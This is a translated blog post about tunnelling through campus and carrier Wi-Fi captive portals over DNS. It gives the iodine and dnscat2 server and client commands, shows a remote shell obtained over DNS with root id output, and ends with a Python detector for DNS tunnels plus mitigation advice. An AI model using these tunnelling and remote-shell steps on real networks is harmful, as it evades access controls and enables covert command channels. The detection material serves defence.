DNS Tunnel Test
Source: Internet | Editor: 程序博客网 | Time: 2024/04/30 02:10
I first connected to CMCC-EDU and then noticed that the routing table had changed.
➜ ~ route -n                                                    [20:18:44]
Kernel IP routing table
Destination     Gateway         Genmask         Flags Metric Ref    Use Iface
0.0.0.0         192.168.170.2   0.0.0.0         UG    0      0        0 eth0
0.0.0.0         10.254.47.1     0.0.0.0         UG    600    0        0 wlan0
10.254.47.0     0.0.0.0         255.255.255.0   U     600    0        0 wlan0
192.168.170.0   0.0.0.0         255.255.255.0   U     0      0        0 eth0
218.207.3.4     10.254.47.1     255.255.255.255 UGH   600    0        0 wlan0
Then I noticed that the DNS servers had changed as well. Judging by the modification time of /etc/resolv.conf, the file was modified after connecting to the hotspot.
➜ ~ cat /etc/resolv.conf                                        [20:19:05]
# Generated by NetworkManager
nameserver 218.201.17.2
nameserver 218.201.4.3
➜ ~ ll /etc/resolv.conf                                         [20:19:12]
lrwxrwxrwx 1 root root 35 Apr 11 20:17 /etc/resolv.conf -> /var/run/NetworkManager/resolv.conf
Before that, my DNS server had been set to the default, a virtual IP on the host machine (192.168.170.2).
➜ ~ cat /etc/resolv.conf                                        [20:45:49]
domain localdomain
search localdomain
nameserver 192.168.170.2
The host machine's IP is 192.168.170.1.
First, on my Kali box, I cut the connection to the host machine so that it communicates with the outside only through the wireless card (by connecting to the CMCC-EDU hotspot):
ifconfig eth0 down
After connecting to the hotspot, I get an internal IP:
➜ ~ ifconfig                                                    [20:23:20]
lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1  (Local Loopback)
        RX packets 6602  bytes 4772279 (4.5 MiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 6602  bytes 4772279 (4.5 MiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

wlan0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 10.254.47.32  netmask 255.255.255.0  broadcast 10.254.47.255
        inet6 fe80::3abe:7cf0:785a:1bba  prefixlen 64  scopeid 0x20<link>
        ether 80:1f:02:ed:14:d8  txqueuelen 1000  (Ethernet)
        RX packets 36  bytes 5250 (5.1 KiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 3128  bytes 251697 (245.7 KiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
The gateway is:
➜ ~ route -n                                                    [20:20:31]
Kernel IP routing table
Destination     Gateway         Genmask         Flags Metric Ref    Use Iface
0.0.0.0         10.254.47.1     0.0.0.0         UG    600    0        0 wlan0
10.254.47.0     0.0.0.0         255.255.255.0   U     600    0        0 wlan0
218.207.3.4     10.254.47.1     255.255.255.255 UGH   600    0        0 wlan0
Then, although no HTTP response comes back and baidu.com cannot be pinged, DNS still succeeds:
➜ ~ curl 10.254.47.1                                            [20:21:17]
curl: (52) Empty reply from server
➜ ~ dig baidu.com @218.201.17.2                                 [20:21:23]

; <<>> DiG 9.10.3-P4-Debian <<>> baidu.com @218.201.17.2
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 19904
;; flags: qr rd ra; QUERY: 1, ANSWER: 4, AUTHORITY: 0, ADDITIONAL: 1

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4096
;; QUESTION SECTION:
;baidu.com.                     IN      A

;; ANSWER SECTION:
baidu.com.              10252   IN      A       111.13.101.208
baidu.com.              10252   IN      A       180.149.132.47
baidu.com.              10252   IN      A       123.125.114.144
baidu.com.              10252   IN      A       220.181.57.217

;; Query time: 5 msec
;; SERVER: 218.201.17.2#53(218.201.17.2)
;; WHEN: Tue Apr 11 20:21:54 CST 2017
;; MSG SIZE  rcvd: 102

➜ ~ ping 180.149.132.47                                         [20:21:54]
PING 180.149.132.47 (180.149.132.47) 56(84) bytes of data.
^C
--- 180.149.132.47 ping statistics ---
6 packets transmitted, 0 received, 100% packet loss, time 5105ms

➜ ~ dig mydomain.me @218.201.17.2                               [20:22:08]

; <<>> DiG 9.10.3-P4-Debian <<>> mydomain.me @218.201.17.2
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 45846
;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4096
;; QUESTION SECTION:
;mydomain.me.                   IN      A

;; ANSWER SECTION:
mydomain.me.            10723   IN      A       123.my.i.p

;; Query time: 1041 msec
;; SERVER: 218.201.17.2#53(218.201.17.2)
;; WHEN: Tue Apr 11 20:22:25 CST 2017
;; MSG SIZE  rcvd: 55
So I wondered: could a DNS tunnel be used here?
The server side is already configured, using iodine:
sudo iodined -f 192.168.77.1 ns.mydomain.me -P mypassword
Next is my Kali client.
➜ ~ iodine -f -P mypassword 123.my.i.p ns.mydomain.me          [1:57:54]
Opened dns0
Opened IPv4 UDP socket
Sending DNS queries for ns.mydomain.me to 123.my.i.p
Autodetecting DNS query type (use -T to override).....................
iodine: No suitable DNS query type found. Are you connected to a network?
iodine: If you expect very long roundtrip delays, use -T explicitly.
iodine: (Also, connecting to an "ancient" version of iodined won't work.)
However, it did not succeed. Sure enough, CMCC-EDU has done somewhat better on the security side than the school. Although a reverse DNS shell can be used on CMCC-EDU.
Trying the CQUPT wireless network
And there it is: as soon as I connected to CQUPT, the DNS servers were changed:
➜ ~ cat /etc/resolv.conf                                        [1:08:47]
# Generated by NetworkManager
search cqupt.edu.cn
nameserver 61.128.128.68
nameserver 202.202.32.33
nameserver 202.202.32.34
But when I used the CQUPT wireless network, it succeeded. Sure enough, the wireless network the school built itself is not all that secure or rigorous (I recall that for a while you could get free internet access on it anyway, and then it was blocked again).
Using dnscat
Server side
$ git clone https://github.com/iagox86/dnscat2.git
$ cd dnscat2/server/
$ gem install bundler
$ bundle install
$ sudo ruby ./dnscat2.rb ns.mydomain.me
Client side
On Linux/Unix you need to download the source and compile it first:
$ git clone https://github.com/iagox86/dnscat2.git
$ cd dnscat2/client/
$ make
Once the build succeeds,
Note that during transmission, the following shows up frequently:
[[ ERROR ]] :: DNS: RCODE_REFUSED
[[ ERROR ]] :: DNS: RCODE_REFUSED
[[ ERROR ]] :: DNS: RCODE_REFUSED
[[ ERROR ]] :: DNS: RCODE_REFUSED
[[ ERROR ]] :: The server hasn't returned a valid response in the last 20 attempts.. closing session.
[[ ERROR ]] :: DNS: RCODE_REFUSED
[[ ERROR ]] :: The server hasn't returned a valid response in the last 20 attempts.. closing session.
[[ WARNING ]] :: exec driver shut down; killing process 35257
[[ ERROR ]] :: DNS: RCODE_REFUSED
[[ FATAL ]] :: There are no active sessions left! Goodbye!
[[ WARNING ]] :: Terminating
Finally, if the server has not issued any command within the last 20 attempts, the client shuts down (as shown above).
Successfully obtained a shell
Kali client
Encrypted session established! For added security, please verify the server also displays this string:

Strode Teeth Plight Push Story Yerba

Session established!
Server side
>> Strode Teeth Plight Push Story Yerba

This is a console session!

That means that anything you type will be sent as-is to the
client, and anything they type will be displayed as-is on the
screen! If the client is executing a command and you don't
see a prompt, try typing 'pwd' or something!

To go back, type ctrl-z.

sh (kali) 2> cat /etc/issue
sh (kali) 2> Kali GNU/Linux Rolling \n \l

sh (kali) 2> id
sh (kali) 2> uid=0(root) gid=0(root) groups=0(root)
sh (kali) 2>
Here, 218.201.17.2 is the CMCC DNS server.
Everything captured with Wireshark on the Kali box is DNS traffic.
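The Wireshark observation above, nothing but DNS on the wire, is also what a network defender can key on. The following is an added example, not code from the original post and not the iodine or dnscat2 projects' own code: a small Python detector that scores a resolver's query log per client and zone on the indicators a DNS tunnel leaves behind, namely long query names, high-entropy subdomains, names that never repeat, and record types that carry larger payloads (NULL, TXT, CNAME). The log format, the thresholds and the sample log lines (including the queries under ns.mydomain.me) are constructed assumptions.

```python
"""Heuristic DNS-tunnel detector over a resolver query log.

Added example for this page: not code from the original post, and not the
iodine or dnscat2 projects' own code. The log format, thresholds and sample
lines are constructed assumptions; tune thresholds against a real baseline.
"""
import math
import re
from collections import defaultdict

# Assumed log format, one query per line: "<epoch> <client_ip> <qtype> <qname>"
LOG_LINE = re.compile(r"^(?P<ts>\d+)\s+(?P<client>\S+)\s+(?P<qtype>[A-Z]+)\s+(?P<qname>\S+)$")

# Thresholds (assumptions): tunnels pack payload into long, high-entropy,
# never-repeating labels and lean on record types that carry more bytes.
MAX_QNAME_LEN = 60
ENTROPY_THRESHOLD = 3.5      # bits per character of the subdomain part
MIN_UNIQUE_NAMES = 5
UNIQUE_RATIO = 0.9           # share of queries whose name was never seen before
SUSPECT_QTYPES = {"NULL", "TXT", "CNAME", "MX", "SRV"}


def shannon_entropy(text):
    """Bits per character of `text`; 0.0 for an empty string."""
    if not text:
        return 0.0
    counts = defaultdict(int)
    for ch in text:
        counts[ch] += 1
    n = len(text)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def registered_zone(qname, depth=2):
    """Approximate the controlled zone as the last `depth` labels.
    Assumption: no public-suffix list, so 'a.ns.mydomain.me.' -> 'mydomain.me'."""
    labels = qname.rstrip(".").lower().split(".")
    return ".".join(labels[-depth:])


def parse_log(lines):
    """Parse log lines into dicts; lines that do not match the format are skipped."""
    records = []
    for line in lines:
        m = LOG_LINE.match(line.strip())
        if m:
            records.append(m.groupdict())
    return records


def analyse(lines):
    """Score every (client, zone) pair; return those with two or more indicators.

    Each finding maps to {"metrics": {...}, "reasons": [...]}."""
    per_zone = defaultdict(lambda: {"names": set(), "qtypes": defaultdict(int), "total": 0})
    for rec in parse_log(lines):
        name = rec["qname"].rstrip(".").lower()
        agg = per_zone[(rec["client"], registered_zone(name))]
        agg["names"].add(name)
        agg["qtypes"][rec["qtype"]] += 1
        agg["total"] += 1

    findings = {}
    for (client, zone), agg in per_zone.items():
        suffix = "." + zone
        # Subdomain part relative to the zone, e.g. "<payload>.ns" for "<payload>.ns.mydomain.me"
        subs = [n[: -len(suffix)] for n in agg["names"] if n.endswith(suffix)]
        metrics = {
            "total": agg["total"],
            "long_names": sum(1 for n in agg["names"] if len(n) > MAX_QNAME_LEN),
            "mean_entropy": (sum(shannon_entropy(s.replace(".", "")) for s in subs) / len(subs))
                            if subs else 0.0,
            "unique_ratio": len(agg["names"]) / agg["total"],
            "suspect_types": {t: c for t, c in agg["qtypes"].items() if t in SUSPECT_QTYPES},
        }
        reasons = []
        if metrics["long_names"]:
            reasons.append(f"{metrics['long_names']} query name(s) longer than {MAX_QNAME_LEN} chars")
        if metrics["mean_entropy"] > ENTROPY_THRESHOLD:
            reasons.append(f"mean subdomain entropy {metrics['mean_entropy']:.2f} bits/char")
        if len(agg["names"]) >= MIN_UNIQUE_NAMES and metrics["unique_ratio"] >= UNIQUE_RATIO:
            reasons.append(f"{len(agg['names'])} of {agg['total']} query names never repeated")
        if metrics["suspect_types"]:
            reasons.append("payload-friendly record types: "
                           + ", ".join(f"{t}x{c}" for t, c in sorted(metrics["suspect_types"].items())))
        if len(reasons) >= 2:
            findings[(client, zone)] = {"metrics": metrics, "reasons": reasons}
    return findings


# Constructed sample: ordinary web lookups next to five tunnel-style queries
# under ns.mydomain.me (the zone the post delegates to its tunnel server).
SAMPLE_LOG = """
1491913330 10.254.47.32 A baidu.com.
1491913331 10.254.47.32 A www.baidu.com.
1491913332 10.254.47.32 AAAA www.baidu.com.
1491913340 10.254.47.32 NULL abcdefghijklmnopqrstuvwxyz234567.765432zyxwvutsrqponmlkjihgfedcba.ns.mydomain.me.
1491913341 10.254.47.32 TXT 0123456789abcdef.ns.mydomain.me.
1491913342 10.254.47.32 TXT fedcba9876543210.ns.mydomain.me.
1491913343 10.254.47.32 NULL 234567abcdefghijklmnopqrstuvwxyz.ns.mydomain.me.
1491913344 10.254.47.32 CNAME 0f1e2d3c4b5a6978.ns.mydomain.me.
""".strip().splitlines()

if __name__ == "__main__":
    for (client, zone), finding in analyse(SAMPLE_LOG).items():
        print(f"{client} -> {zone}")
        for reason in finding["reasons"]:
            print("   ", reason)
```

On the sample, the baidu.com lookups produce no indicator and the ns.mydomain.me queries trip all four. The thresholds are starting points only: CDNs, DNS-based block lists and some anti-virus products also generate many unique, high-entropy subdomains, so baseline per-client volume and unique-name ratio before alerting. For the captive-portal setting in the post, the cleaner mitigation sits one layer lower: answer every query from an unauthenticated client with the portal's own address instead of forwarding it to a recursive resolver, so there is no upstream path for a tunnel to ride in the first place.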
Reference:
利用 DNS 隧道传递数据和命令来绕过防火墙 (Using DNS tunnels to carry data and commands past a firewall)
Aside
After opening Wireshark, I noticed that my machine was trying to establish a TCP connection to some IP (52.39.237.157), so I looked it up. In the end I suspect it was the Firefox browser I had open: having failed to reach api.ipify.org earlier, it was now retrying. Checking with ipip, this IP should indeed be api.ipify.org's. Perhaps this is Firefox's policy: if a connection does not go through, it retries after a while.
➜ reGeorg master ✓ ipip 52.39.237.157                           [20:24:27]
 美国俄勒冈州波特兰 amazon.com
➜ reGeorg master ✓ ipip api.ipify.org                           [20:24:31]
 美国弗吉尼亚州阿什本 amazon.com